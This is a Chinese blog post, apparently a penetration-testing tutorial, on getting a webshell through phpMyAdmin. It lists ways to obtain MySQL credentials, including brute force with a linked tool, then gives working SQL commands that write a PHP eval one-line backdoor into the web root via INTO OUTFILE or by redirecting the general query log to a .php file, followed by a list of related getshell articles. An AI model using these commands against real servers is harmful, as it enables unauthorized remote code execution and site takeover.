phpmyadmin写入webshell

最新推荐文章于 2024-07-15 15:01:56 发布
最新推荐文章于 2024-07-15 15:01:56 发布
阅读量1.5k 收藏 10
点赞数 1
分类专栏: web渗透 文章标签: web渗透 渗透测试 mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kris__zhang/article/details/114829415
版权

获取MySQL密码的方法

1、源代码泄露
2、暴力破解mysql
3、爆破出的phpmyadmin未授权访问漏洞
4、通过文件包含漏洞读取配置文件中的数据库账号密码
5、其他方式获取

暴力破解工具下载地址:https://wws.lanzous.com/i3iOTmyfhxg
密码:3uk5

我们成功的获取到mysql的账号密码,登录到phpmyadmin管理界面之后,可通过以下方式写入webshell。

select … . into outfile 语句直接写入webshell

必需满足的条件

root数据库用户(root权限)、secure_file_priv没有具体值、网站绝对路径

利用方式

查看当前是否有写入文件的权限,需要查看变量secure_file_priv的值,只有secure_file_priv没有具体值,我们才可以导入导出文件,如果有具体的值或者为NULL时,我们就写入不了文件
执行命令,查看权限:show global variables like 'secure%';
在这里插入图片描述
secure_file_priv为空,说明可以写入文件
修改secure_file_priv的方法
查看了mysql.cnf中居然没有对这个参数进行设定,就说明这个参数默认便是null,所以在mysql.cnf中的[mysqld]加入secure_file_priv =就具有写入权限。

查看mysql数据库的绝对路径 select @@basedir
在这里插入图片描述
执行一下命令写入shell :select '<?php eval($_POST["cmd"]);?>' INTO OUTFILE 'C:/phpstudy/WWW/lemonlove77.php';
在这里插入图片描述
在这里插入图片描述
写入成功,蚁剑连接
在这里插入图片描述

日志文件写入一句话来获取webshell

mysql 5.0版本以上会创建日志文件,我们通过修改日志的全局变量,可以写入webshell,mysql的两个全局变量:general_log和general_log file。

general_log :指的是日志保存的状态,ON代表开启OFF代表关闭
general_log_file :日志的保存路径
查看general_log和general_log_file变量的值:show variables like '%general%'
在这里插入图片描述
这里general_log的值是OFF,使用命令set global general_log='on'打开
在这里插入图片描述
在这里插入图片描述

当general_log的值位on时,所执行的sql语句都会出现win7.log文件,设置general_log_file的值,设置为网站根目录下,执行的sql语句就会在该文件中,执行以下命令

set global general_log_file="C:/phpStudy/WWW/xp.php"

在这里插入图片描述

现在,执行一句话木马语句,会被记录在日志文件中

SELECT '<?php eval($_POST["cmd"]);?>'

在这里插入图片描述
在这里插入图片描述

蚁剑连接
在这里插入图片描述

刘—手
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PhpMyadmin后台拿webshell方法总结
浅笑996的博客
06-29 3740
前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
web渗透【11】phpmyadminshell的三种方法
司徒荆的博客
05-30 5906
查看phpMyAdmin能否自定义导出文件目录的权限
sql注入和phpmyadmin日志写入webshell
weixin_54813510的博客
05-25 1668
写入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
红队攻防实战之phpmyadmin-RCE集锦
自强不息
12-10 941
世界上只有一种真正的英雄主义,那就是认清了生活的真相后,仍然热爱她
phpmyadmin登录后台后利用日志或file_into写入webshell
不想当脚本小子的脚本小子
01-15 552
必须为root权限并且已知网站路径: 在后台管理界面中,将general log改为ON ,general log file另存为网站目录下(webshell必须写入到网站目录下) 再利用sql语句写入用菜刀连接即可
webshell php 教程,技术分享丨phpMyAdmin 常见写入webshell的方法(二)
weixin_39844963的博客
03-17 182
六.CVE-2018-19968 phpmyadmin文件包含getshell环境搭建:在线环境VulnSpy已为大家提供在线phpMyAdmin环境地址:https : //www.vsplate.com/?github = vulnspy/phpmyadmin-4.8.1,单击又上角的START TO HACK按钮可进行在线测试。也可以选择自行到phpmyadmin官网下载对应版本。利用条件...
利用phpmyadmin获得webshell
Mikasa
03-12 1534
这个是网上无意间找到的测试了一下竟然可用。。。嘿嘿嘿嘿嘿 1.利用Nmap扫描当前局域网网段上所有主机 nmap -sn -PE 192.168.1.0/24 ##扫描192.168.1网段上的所有主机 发现: 发现了不少于是,一个一个试试看打开了phpstudy没有,最终发现了一个: 竟然连探针都没删,暴露了物理地址!!!还可以试试phpinfo.php有没有删除。。还有进行...
phpmyadmin Getshell 思路
ITgougou_的博客
11-14 453
前几天遇到一个phpmyadmin,可惜在网上也没找到绝对路径,也就没办法上传木马getshell,这里梳理一下phpmyadmin getshell思路。 这里getshell必须要知道网站的绝对路径,这也是信息收集的重要部分 前提:php爆绝对路径 单引号爆路径 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=1′ 错误参数值爆路径 将要提交的参数值改成错误值,比如-1。-99999单引号被.
phpmyadmin上传Webshell总结.docx
08-31
利用MySQL的日志功能,比如查询日志或慢查询日志,将Webshell写入这些日志文件,然后将日志文件转换为可执行的脚本。 (1)通过查询日志:确保查询日志开启,Webshell将记录在查询日志中。 (2)通过慢查询日志...
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
phpMyAdmin
08-18
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
phpMyAdmin v4.8.5
10-04
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
phpMyAdmin_phpmyadmin_
09-30
phpMyAdminMySQL数据库管理的网页神器》 phpMyAdmin是一款广受欢迎的开源Web应用程序,主要用于管理和操作MySQL数据库。它的出现使得用户无需通过命令行界面就能方便地执行各种数据库管理任务,极大地降低了...
phpmyadmin上传Webshell总结
afei001
08-31 512
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE写入一句话 (2)select ... INTO OUTFILE写入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志写入webshell (1)通过查询日志写入webshell (2)通过慢查询日志写入webshell 5.菜刀连接Windows和Linux系统区别
使用Apache搭建Web网站服务器
热门推荐
菜鸟、上路
05-21 4万+
一、Apache服务器概述-安装 1、web服务器概述 web服务器也简称WWW(world wide web 万维网)服务器,主要功能是提供网上信息浏览服务 2、什么是apache? Apache HTTPD Server 简称 Apache,是 Apache 软件基金会的一个开源的网页服务器, 可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之...
如何用PHPwebshell,phpAdmin写webshell的方法
weixin_42299018的博客
03-16 640
一、常规导入shell的操作创建数据表导出shellCREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘’);SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\W...
phpmyadmin通过日志文件拿webshell
aiquan9342的博客
03-26 475
该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。 前提:条件是root用户。 思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修...
MySQL & NaviCat 安装及配置教程(Windows)【安装】
最新发布
绯樱殇雪的博客
07-15 360
MySQL & NaviCat 安装及配置教程
phpmyadmin安装文档.docx
02-25
"phpmyadmin安装文档" 在安装和配置phpMyAdmin时,了解必要的安全措施和操作系统特定的安装步骤是至关重要的。phpMyAdmin是一个基于WebMySQL数据库管理工具,它不负责设置数据库服务器的安全性,而是依赖于系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值